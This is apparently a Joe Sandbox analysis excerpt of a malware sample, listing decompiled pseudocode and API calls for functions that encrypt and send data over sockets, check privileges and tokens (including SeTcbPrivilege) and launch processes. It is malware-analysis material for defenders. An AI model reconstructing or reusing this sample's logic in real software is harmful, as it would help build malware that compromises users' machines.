    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A3EE9, Relevance: 6.1, APIs: 4, Instructions: 126network
    C-Code - Quality: 30%
    			E003A3EE9(intOrPtr* __eax, void* __ecx, void* __eflags) {
				void* _v8;
				void* _v12;
				char _v32;
				void _v148;
				void* __esi;
				short _t38;
				void* _t54;
				void _t55;
				intOrPtr* _t68;
				void* _t70;
				signed int _t71;
				void* _t78;
				void* _t86;

				_t70 = __ecx;
				_t68 = __eax;
				_t78 =  *0x3b8538(0x200);
				_v8 = _t78;
				_v12 =  *0x3b8538(0x200);
				memset(_t78, 0, 0x200);
				 *_t78 = 0xd;
				_t38 = E003AE937(_t70);
				 *((short*)(_t68 + 0x138)) = _t38;
				__imp__#9(_t38);
				 *((short*)(_t78 + 3)) = _t38;
				 *0x3b899c(_t68 + 8, _t78, 0x1fd);
				_t71 = 0x1d;
				memcpy( &_v148, _t68 + 8, _t71 << 2);
				 *0x3b8ab0( &_v148,  &_v32);
				_t86 = _v12;
				 *((intOrPtr*)(_v8 + 5)) = _v32;
				memset(_t86, 0, 0x200);
				if(E003A3BB7(_t68 + 0xf0, _v8, 0x1fd, _t86 + 3, _t68 + 0x110, _t68 + 0x120) == 0) {
					L7:
					 *0x3b8540(_v8);
					 *0x3b8540(_t86);
					_t54 = 0;
				} else {
					_t55 =  *(_t68 + 4) & 0x0000ffff;
					__imp__#9(_t55);
					 *_t86 = _t55;
					 *((char*)(_t86 + 2)) = 3;
					if(E003AFD0B( *_t68, _t86, 0x200) != 0x200) {
						goto L7;
					} else {
						if(E003AFB73( *_t68, _v8, 0x200) != 0x200 ||  *((char*)(_v8 + 2)) != 3 || E003A3BB7(_t68 + 0x100, _v8 + 3, 0x1fd, _v12, _t68 + 0x124, _t68 + 0x134) == 0 ||  *_v12 != 4) {
							_t86 = _v12;
							goto L7;
						} else {
							 *0x3b8540(_v8);
							 *0x3b8540(_v12);
							_t54 = 1;
						}
					}
				}
				return _t54;
			}
















    0x003a3ee9
    0x003a3efb
    0x003a3f03
    0x003a3f06
    0x003a3f16
    0x003a3f19
    0x003a3f21
    0x003a3f24
    0x003a3f2a
    0x003a3f31
    0x003a3f38
    0x003a3f41
    0x003a3f49
    0x003a3f5e
    0x003a3f60
    0x003a3f6c
    0x003a3f78
    0x003a3f7b
    0x003a3fab
    0x003a4024
    0x003a4027
    0x003a402e
    0x003a4034
    0x003a3fad
    0x003a3fad
    0x003a3fb2
    0x003a3fb9
    0x003a3fbc
    0x003a3fcd
    0x00000000
    0x003a3fcf
    0x003a3fde
    0x003a4021
    0x00000000
    0x003a4038
    0x003a403b
    0x003a4044
    0x003a404c
    0x003a404c
    0x003a3fde
    0x003a3fcd
    0x003a4053

    APIs
    • memset.MSVCRT ref: 003A3F19
    • htons.WS2_32(00000000), ref: 003A3F31
    • memset.MSVCRT ref: 003A3F7B
      • Part of subcall function 003A3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003A3BCF
      • Part of subcall function 003A3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003A3C60
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3C71
      • Part of subcall function 003A3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003A3D87
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DD2
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3DF2
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DFD
    • htons.WS2_32(?), ref: 003A3FB2
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFDE5
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFDF7
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFE15
      • Part of subcall function 003AFD0B: memset.MSVCRT ref: 003AFE5E
      • Part of subcall function 003AFD0B: htons.WS2_32(00000301), ref: 003AFEB9
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFEC2
      • Part of subcall function 003AFD0B: send.WS2_32(?,?,?,00000000), ref: 003AFED4
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBB0
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBC9
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBD8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBED
      • Part of subcall function 003AFB73: htons.WS2_32(?), ref: 003AFC25
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCA2
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCB8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCD6
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A0B00, Relevance: 6.1, APIs: 4, Instructions: 85
    C-Code - Quality: 69%
    			E003A0B00(void* __ecx, char __edx, void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				void* _t21;
				char _t34;
				char* _t36;
				void* _t37;
				void* _t39;
				void* _t40;
				void* _t41;
				void* _t42;
				void* _t44;
				void* _t48;

				_t34 = __edx;
				_t26 = _a4;
				_t37 = __ecx;
				_v20 = 0;
				_v16 = 0;
				_t14 = E0039C7B0(0, __eflags, _a4);
				_a4 = _t14;
				if(_t14 == 0) {
					L10:
					return 0;
				}
				_t16 = E0039ED90(_t14, 0, 0,  &_v20);
				_t42 = _t41 + 0x10;
				if(_t16 == 0) {
					L9:
					E0039BB40(_a4);
					goto L10;
				}
				__imp___time64(0);
				_t42 = _t42 + 4;
				_t18 = _t16 - _v20;
				_t48 = _t18;
				asm("sbb edx, [ebp-0xc]");
				_v8 = _t34;
				if(_t48 < 0) {
					goto L9;
				}
				if(_t48 > 0) {
					L5:
					_t39 = E00391BE0(_t37, _t49, _t26);
					_t50 = _t39;
					if(_t39 != 0) {
						E00397A20(_t26, _t39, _t37);
						_push(_t39);
						L00391CB0();
						_t44 = _t42 + 4;
						_t36 =  &_v8;
						_t21 = E0039EE40(_t37, _t36, _t50, _t26, _t36);
						_t40 = _t21;
						if(_t40 != 0) {
							E00397A20(_t26, _t40, _t37);
							_push(_t40);
							L00391CB0();
							_t42 = _t44 + 4;
						} else {
							__imp___time64(_t21);
							_v20 = _t21 - 0x3ed78;
							asm("sbb edx, esi");
							_v16 = _t36;
							E0039CAA0(_a4, _t40, _t40,  &_v20);
							_t42 = _t44 + 0x14;
						}
					}
					goto L9;
				}
				_t49 = _t18 - 0x3f480;
				if(_t18 <= 0x3f480) {
					goto L9;
				}
				goto L5;
			}






















    0x003a0b00
    0x003a0b07
    0x003a0b0f
    0x003a0b11
    0x003a0b14
    0x003a0b17
    0x003a0b1c
    0x003a0b21
    0x003a0bd2
    0x003a0bd8
    0x003a0bd8
    0x003a0b2e
    0x003a0b33
    0x003a0b38
    0x003a0bc4
    0x003a0bc8
    0x00000000
    0x003a0bcd
    0x003a0b3f
    0x003a0b45
    0x003a0b48
    0x003a0b48
    0x003a0b4b
    0x003a0b4e
    0x003a0b51
    0x00000000
    0x00000000
    0x003a0b53
    0x003a0b5c
    0x003a0b64
    0x003a0b66
    0x003a0b68
    0x003a0b6c
    0x003a0b71
    0x003a0b72
    0x003a0b77
    0x003a0b7a
    0x003a0b81
    0x003a0b86
    0x003a0b8a
    0x003a0bb6
    0x003a0bbb
    0x003a0bbc
    0x003a0bc1
    0x003a0b8c
    0x003a0b8d
    0x003a0b9b
    0x003a0ba3
    0x003a0ba7
    0x003a0baa
    0x003a0baf
    0x003a0baf
    0x003a0b8a
    0x00000000
    0x003a0b68
    0x003a0b55
    0x003a0b5a
    0x00000000
    0x00000000
    0x00000000

    APIs
      • Part of subcall function 0039C7B0: GetFullPathNameW.KERNEL32(?,00000105,00000000,00000000,?,00000000), ref: 0039C828
      • Part of subcall function 0039ED90: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,0039FE81,?,00394D1E,?,00000000,00000000,?), ref: 0039EDB6
    • _time64.MSVCRT ref: 003A0B3F
      • Part of subcall function 00391BE0: ??2@YAPAXI@Z.MSVCRT ref: 00391C02
      • Part of subcall function 00391BE0: ??3@YAXPAX@Z.MSVCRT ref: 00391C4A
      • Part of subcall function 00397A20: SysFreeString.OLEAUT32(?), ref: 00397A3C
    • ??3@YAXPAX@Z.MSVCRT ref: 003A0B72
      • Part of subcall function 0039EE40: ??2@YAPAXI@Z.MSVCRT ref: 0039EF57
      • Part of subcall function 0039EE40: ??3@YAXPAX@Z.MSVCRT ref: 0039EF96
      • Part of subcall function 0039EE40: ??3@YAXPAX@Z.MSVCRT ref: 0039F02B
    • _time64.MSVCRT ref: 003A0B8D
    • ??3@YAXPAX@Z.MSVCRT ref: 003A0BBC
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B2614, Relevance: 6.0, APIs: 4, Instructions: 49
    C-Code - Quality: 100%
    			E003B2614() {
				intOrPtr _t10;
				intOrPtr* _t11;
				signed int _t12;
				intOrPtr* _t15;
				intOrPtr* _t16;
				void* _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				signed int _t25;
				signed int _t26;
				void* _t28;

				_t28 =  *0x390000 - 0x5a4d; // 0x5a4d
				if(_t28 == 0) {
					_t10 =  *0x39003c; // 0x108
					_t1 = _t10 + 0x390000; // 0x4550
					_t11 = _t1;
					__eflags =  *_t11 - 0x4550;
					if( *_t11 != 0x4550) {
						goto L1;
					} else {
						_t25 =  *(_t11 + 0x18) & 0x0000ffff;
						__eflags = _t25 - 0x10b;
						if(_t25 == 0x10b) {
							__eflags =  *((intOrPtr*)(_t11 + 0x74)) - 0xe;
							if( *((intOrPtr*)(_t11 + 0x74)) <= 0xe) {
								goto L1;
							} else {
								_t26 = 0;
								__eflags =  *(_t11 + 0xe8);
								goto L9;
							}
						} else {
							__eflags = _t25 - 0x20b;
							if(_t25 != 0x20b) {
								goto L1;
							} else {
								__eflags =  *((intOrPtr*)(_t11 + 0x84)) - 0xe;
								if( *((intOrPtr*)(_t11 + 0x84)) <= 0xe) {
									goto L1;
								} else {
									_t26 = 0;
									__eflags =  *(_t11 + 0xf8);
									L9:
									_t8 = __eflags != 0;
									__eflags = _t8;
									_t12 = _t26 & 0xffffff00 | _t8;
								}
							}
						}
					}
				} else {
					L1:
					_t12 = 0;
				}
				 *0x3b864c = _t12;
				__set_app_type(E0039984A(2));
				 *0x3b8c30 =  *0x3b8c30 | 0xffffffff;
				 *0x3b8c34 =  *0x3b8c34 | 0xffffffff;
				_t15 = __p__fmode();
				_t22 =  *0x3b8988; // 0x0
				 *_t15 = _t22;
				_t16 = __p__commode();
				_t23 =  *0x3b8984; // 0x0
				 *_t16 = _t23;
				_t17 = E00397D3B();
				if( *0x3b8128 == 0) {
					__setusermatherr(E00397D3B);
				}
				E00391421(_t17);
				return 0;
			}














    0x003b2619
    0x003b2620
    0x003b2626
    0x003b262b
    0x003b262b
    0x003b2631
    0x003b2637
    0x00000000
    0x003b2639
    0x003b2639
    0x003b263d
    0x003b2643
    0x003b2660
    0x003b2664
    0x00000000
    0x003b2666
    0x003b2666
    0x003b2668
    0x00000000
    0x003b2668
    0x003b2645
    0x003b2645
    0x003b264b
    0x00000000
    0x003b264d
    0x003b264d
    0x003b2654
    0x00000000
    0x003b2656
    0x003b2656
    0x003b2658
    0x003b266e
    0x003b266e
    0x003b266e
    0x003b2671
    0x003b2671
    0x003b2654
    0x003b264b
    0x003b2643
    0x003b2622
    0x003b2622
    0x003b2622
    0x003b2622
    0x003b2675
    0x003b2680
    0x003b2686
    0x003b268d
    0x003b2696
    0x003b269c
    0x003b26a2
    0x003b26a4
    0x003b26aa
    0x003b26b0
    0x003b26b2
    0x003b26be
    0x003b26c5
    0x003b26cb
    0x003b26cc
    0x003b26d3

    APIs
      • Part of subcall function 0039984A: GetModuleHandleA.KERNEL32(00000000), ref: 00399851
    • __set_app_type.MSVCRT ref: 003B2680
    • __p__fmode.MSVCRT ref: 003B2696
    • __p__commode.MSVCRT ref: 003B26A4
    • __setusermatherr.MSVCRT ref: 003B26C5
      • Part of subcall function 00391421: _controlfp.MSVCRT ref: 0039142B
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003AEB1E, Relevance: 6.0, APIs: 4, Instructions: 39network
    APIs
    • socket.WS2_32(00000002,00000001,00000000), ref: 003AEB2B
    • connect.WS2_32(00000000,?,00000010), ref: 003AEB4F
    • closesocket.WS2_32(00000000), ref: 003AEB5A
    • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000004), ref: 003AEB7C
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00397CF0, Relevance: 6.0, APIs: 4, Instructions: 31
    C-Code - Quality: 54%
    			E00397CF0(intOrPtr* __ecx) {
				void* _t3;
				long _t5;
				intOrPtr _t6;
				intOrPtr* _t8;
				intOrPtr* _t9;
				void* _t10;

				_t8 = __ecx;
				_t9 =  *__ecx;
				if(_t9 != 0) {
					_t5 = InterlockedDecrement(_t9 + 8);
					if(_t5 == 0 && _t9 != 0) {
						_t6 =  *_t9;
						if(_t6 != 0) {
							__imp__#6(_t6);
						}
						_t5 =  *(_t9 + 4);
						if(_t5 != 0) {
							_push(_t5);
							L0039CB64();
							_t10 = _t10 + 4;
						}
						_push(_t9);
						L00391CB0();
					}
					 *_t8 = 0;
					return _t5;
				}
				return _t3;
			}









    0x00397cf2
    0x00397cf4
    0x00397cf8
    0x00397cfe
    0x00397d06
    0x00397d0c
    0x00397d10
    0x00397d13
    0x00397d13
    0x00397d19
    0x00397d1e
    0x00397d20
    0x00397d21
    0x00397d26
    0x00397d26
    0x00397d29
    0x00397d2a
    0x00397d2f
    0x00397d32
    0x00000000
    0x00397d32
    0x00397d3a

    APIs
    • InterlockedDecrement.KERNEL32(?), ref: 00397CFE
    • SysFreeString.OLEAUT32(00000000), ref: 00397D13
    • ??_V@YAXPAX@Z.MSVCRT ref: 00397D21
    • ??3@YAXPAX@Z.MSVCRT ref: 00397D2A
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00392220, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175
    C-Code - Quality: 72%
    			E00392220(intOrPtr __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				void* _v8;
				signed int _v12;
				char _v16;
				void* _v20;
				signed int _v24;
				signed int _v28;
				char _v36;
				short _v40;
				intOrPtr _v44;
				char _v244;
				void* __ebx;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr* _t68;
				intOrPtr* _t77;
				intOrPtr _t80;
				char _t81;
				intOrPtr* _t82;
				intOrPtr* _t85;
				void* _t87;
				intOrPtr* _t91;
				void* _t95;
				void* _t97;
				void* _t103;
				intOrPtr _t117;
				intOrPtr _t139;
				intOrPtr _t141;
				intOrPtr* _t143;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t148;

				_t139 = __ecx;
				_v44 = __ecx;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = 0;
				_v40 = 0;
				E0039BB30( &_v36);
				E0039A540(0, __ecx);
				_t143 = _a4;
				_push( &_v40);
				_push(_t143);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t143 + 0x58))))() >= 0) {
					if(_v40 != 0xffff) {
						L17:
						_v24 = 1;
						 *((intOrPtr*)(_t139 + 0x1c)) = _v12;
						 *((intOrPtr*)(_t139 + 0x24)) = _v28;
					} else {
						_push( &_v20);
						_push(_t143);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t143 + 0x30))))() >= 0) {
							_t77 = _v20;
							_push( &_v12);
							_push(_t77);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t77 + 0x20))))() >= 0) {
								_t80 = E003A1D90(_v12 * 8, 0);
								_t147 = _t146 + 8;
								_v28 = _t80;
								if(_t80 != 0) {
									_t145 = 0;
									if(_v12 <= 0) {
										goto L17;
									} else {
										_t141 = _t80;
										while(1) {
											_t81 = _v16;
											if(_t81 != 0) {
												__imp__#6(_t81);
											}
											_t82 = _v20;
											_push( &_v8);
											_v16 = 0;
											_push(_t145);
											_push(_t82);
											if( *((intOrPtr*)( *((intOrPtr*)( *_t82 + 0x1c))))() < 0) {
												goto L18;
											}
											_t85 = _v8;
											_t87 =  *((intOrPtr*)( *((intOrPtr*)( *_t85 + 0xa4))))(_t85,  &_v16);
											_t157 = _t87;
											if(_t87 >= 0) {
												E00399090(_t157,  &_v244, 0x7c);
												_t117 =  *0x3b8628; // 0x593938
												_t147 = _t147 + 8;
												_push( &_v244);
												_push(_v16);
												if( *((intOrPtr*)( *((intOrPtr*)(_t117 + 0xe0))))() != 0) {
													L15:
													_t91 = _v8;
													 *((intOrPtr*)( *((intOrPtr*)( *_t91 + 8))))(_t91);
													_t145 = _t145 + 1;
													_t141 = _t141 + 8;
													_v8 = 0;
													if(_t145 < _v12) {
														continue;
													} else {
														_t139 = _v44;
														goto L17;
													}
												} else {
													E0039B1E0(0,  &_v36);
													_t95 = E0039A140( &_v36, _v8);
													_t159 = _t95;
													if(_t95 != 0) {
														E00399090(_t159,  &_v244, 0x27);
														_t148 = _t147 + 8;
														_t97 = E00391A10( &_v36,  &_v244, _t141);
														_t160 = _t97;
														if(_t97 != 0) {
															E00399090(_t160,  &_v244, 0x7d);
															_t147 = _t148 + 8;
															_t42 = _t141 + 4; // 0x4
															E00391A10( &_v36,  &_v244, _t42);
															goto L15;
														}
													}
												}
											}
											goto L18;
										}
									}
								}
							}
						}
					}
				}
				L18:
				_t66 = _v16;
				if(_t66 != 0) {
					__imp__#6(_t66);
				}
				_t67 = _v8;
				if(_t67 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t67 + 8))))(_t67);
				}
				_t68 = _v20;
				_pop(_t103);
				if(_t68 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t68 + 8))))(_t68);
				}
				L003926B0(_t103,  &_v36);
				return _v24;
			}



































    0x0039222e
    0x00392233
    0x00392236
    0x00392239
    0x0039223c
    0x0039223f
    0x00392242
    0x00392245
    0x00392248
    0x0039224b
    0x00392252
    0x00392257
    0x00392262
    0x00392263
    0x00392268
    0x00392273
    0x003923c0
    0x003923c6
    0x003923cd
    0x003923d0
    0x00392279
    0x00392281
    0x00392282
    0x00392287
    0x0039228d
    0x00392295
    0x00392296
    0x0039229e
    0x003922b0
    0x003922b5
    0x003922b8
    0x003922bd
    0x003922c3
    0x003922c8
    0x00000000
    0x003922ce
    0x003922ce
    0x003922d0
    0x003922d0
    0x003922d5
    0x003922d8
    0x003922d8
    0x003922de
    0x003922e4
    0x003922e5
    0x003922ea
    0x003922eb
    0x003922f3
    0x00000000
    0x00000000
    0x003922f9
    0x00392309
    0x0039230b
    0x0039230d
    0x0039231c
    0x00392324
    0x0039232a
    0x00392333
    0x0039233a
    0x0039233f
    0x003923a2
    0x003923a2
    0x003923ab
    0x003923ad
    0x003923ae
    0x003923b1
    0x003923b7
    0x00000000
    0x003923bd
    0x003923bd
    0x00000000
    0x003923bd
    0x00392341
    0x00392344
    0x00392350
    0x00392355
    0x00392357
    0x00392362
    0x00392367
    0x00392375
    0x0039237a
    0x0039237c
    0x00392387
    0x0039238c
    0x0039238f
    0x0039239d
    0x00000000
    0x0039239d
    0x0039237c
    0x00392357
    0x0039233f
    0x00000000
    0x0039230d
    0x003922d0
    0x003922c8
    0x003922bd
    0x0039229e
    0x00392287
    0x00392273
    0x003923d3
    0x003923d3
    0x003923d8
    0x003923db
    0x003923db
    0x003923e1
    0x003923e6
    0x003923ee
    0x003923ee
    0x003923f0
    0x003923f7
    0x003923f8
    0x00392400
    0x00392400
    0x00392405
    0x00392410

    APIs
      • Part of subcall function 0039A540: SysFreeString.OLEAUT32(00000000), ref: 0039A559
      • Part of subcall function 0039A540: SysFreeString.OLEAUT32(00000001), ref: 0039A563
    • SysFreeString.OLEAUT32(?), ref: 003923DB
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • SysFreeString.OLEAUT32(?), ref: 003922D8
      • Part of subcall function 0039B1E0: SysFreeString.OLEAUT32(?), ref: 0039B1F8
      • Part of subcall function 0039B1E0: SysFreeString.OLEAUT32(?), ref: 0039B201
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00394310, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 145
    C-Code - Quality: 91%
    			E00394310(void* __ecx) {
				short _v8;
				short _v12;
				short _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				char _v100;
				char _v300;
				char _v824;
				WCHAR* _t44;
				WCHAR* _t49;
				WCHAR* _t50;
				WCHAR* _t51;
				WCHAR* _t58;
				intOrPtr _t62;
				WCHAR* _t63;
				void* _t69;
				intOrPtr _t76;
				char* _t84;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t91;
				void* _t93;
				WCHAR* _t95;
				void* _t97;
				void* _t98;

				_t69 = __ecx;
				_v8 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v28 = 0;
				_v32 = 0;
				if(E00396D30() != 0) {
					E0039F990( &_v32);
					_t44 = _v32;
					_t98 = _t97 + 4;
					_t94 =  &_v824;
					_v824 = 0;
					__imp__SHGetFolderPathW(0, 0x1c, _t44, 0,  &_v824, _t93);
					__eflags = _t44;
					if(__eflags >= 0) {
						E00399090(__eflags,  &_v300, 0xe);
						_t98 = _t98 + 8;
						_t84 =  &_v824;
						_t85 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t85 + 0xdc))))(_t84,  &_v300, 0, _t84);
					} else {
						_t94 = 0;
					}
					_t49 = E0039CF50(_t69, _t94,  &_v28);
					_t95 = _v28;
					__eflags = _t49;
					if(_t49 != 0) {
						__eflags = _t95;
						if(_t95 != 0) {
							_t58 = E0039C320( &_v24,  &_v20, _t95, 0x420);
							_t89 =  *0x3b8628; // 0x593938
							_t98 = _t98 + 0x10;
							__eflags = _t58;
							if(_t58 == 0) {
								_v100 = 0x44;
								 *((intOrPtr*)( *((intOrPtr*)(_t89 + 0xb8))))( &_v100);
								_v24 = 0;
								_v20 = 0;
								_v16 = 0;
								_v12 = 0;
								_t62 =  *0x3b8628; // 0x593938
								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t62 + 0xd8))))(_t95, 0, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24);
								__eflags = _t63;
								if(_t63 != 0) {
									goto L9;
								} else {
									 *((intOrPtr*)(_t69 + 0x38)) = 6;
								}
							} else {
								 *((intOrPtr*)( *((intOrPtr*)(_t89 + 0xf8))))(_v24);
								_t91 =  *0x3b8628; // 0x593938
								 *((intOrPtr*)( *((intOrPtr*)(_t91 + 0xf8))))(_v20);
								L9:
								_v8 = 1;
							}
						}
					}
					_t50 = _v24;
					__eflags = _t50;
					if(_t50 != 0) {
						_t87 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xf8))))(_t50);
					}
					_t51 = _v20;
					__eflags = _t51;
					if(_t51 != 0) {
						_t76 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t76 + 0xf8))))(_t51);
					}
					__eflags = _t95;
					if(_t95 != 0) {
						E0039BB40(_t95);
					}
					return _v8;
				} else {
					return E00397D40(_t69);
				}
			}































    0x0039431d
    0x0039431f
    0x00394322
    0x00394325
    0x00394328
    0x0039432b
    0x0039432e
    0x00394331
    0x0039433b
    0x0039434f
    0x00394354
    0x00394357
    0x0039435a
    0x0039436a
    0x00394371
    0x00394377
    0x00394379
    0x00394388
    0x0039438d
    0x00394390
    0x003943a0
    0x003943ae
    0x0039437b
    0x0039437b
    0x0039437b
    0x003943b7
    0x003943bc
    0x003943bf
    0x003943c1
    0x003943c3
    0x003943c5
    0x003943d5
    0x003943da
    0x003943e0
    0x003943e3
    0x003943e5
    0x00394452
    0x00394460
    0x00394472
    0x00394475
    0x00394478
    0x0039447b
    0x0039447e
    0x0039448b
    0x0039448d
    0x0039448f
    0x00000000
    0x00394495
    0x00394495
    0x00394495
    0x003943e7
    0x003943f1
    0x003943f6
    0x00394403
    0x00394405
    0x00394405
    0x00394405
    0x003943e5
    0x003943c5
    0x0039440c
    0x0039440f
    0x00394411
    0x00394413
    0x00394420
    0x00394420
    0x00394422
    0x00394425
    0x00394427
    0x00394429
    0x00394436
    0x00394436
    0x00394438
    0x0039443a
    0x0039443d
    0x00394442
    0x0039444e
    0x0039433d
    0x00394349
    0x00394349

    APIs
      • Part of subcall function 00396D30: GetTokenInformation.KERNELBASE(?,00000001,?,0000004C,?), ref: 00396D8D
      • Part of subcall function 0039F990: GetProcAddress.KERNEL32(00000000,?), ref: 0039FA0F
      • Part of subcall function 0039F990: GetProcAddress.KERNEL32(00000000,?), ref: 0039FA32
      • Part of subcall function 0039F990: GetProcAddress.KERNEL32(00000000,?), ref: 0039FA55
      • Part of subcall function 0039F990: GetProcAddress.KERNEL32(00000000,?), ref: 0039FA78
    • SHGetFolderPathW.SHELL32(00000000,0000001C,?,00000000,?), ref: 00394371
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 0039C320: GetProcAddress.KERNEL32(00000000,?), ref: 0039C3D2
      • Part of subcall function 0039C320: GetProcAddress.KERNEL32(00000000,?), ref: 0039C3F5
      • Part of subcall function 0039C320: GetProcAddress.KERNEL32(00000000,?), ref: 0039C418
      • Part of subcall function 0039C320: GetProcAddress.KERNEL32(00000000,?), ref: 0039C43B
      • Part of subcall function 0039C320: LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 0039C48A
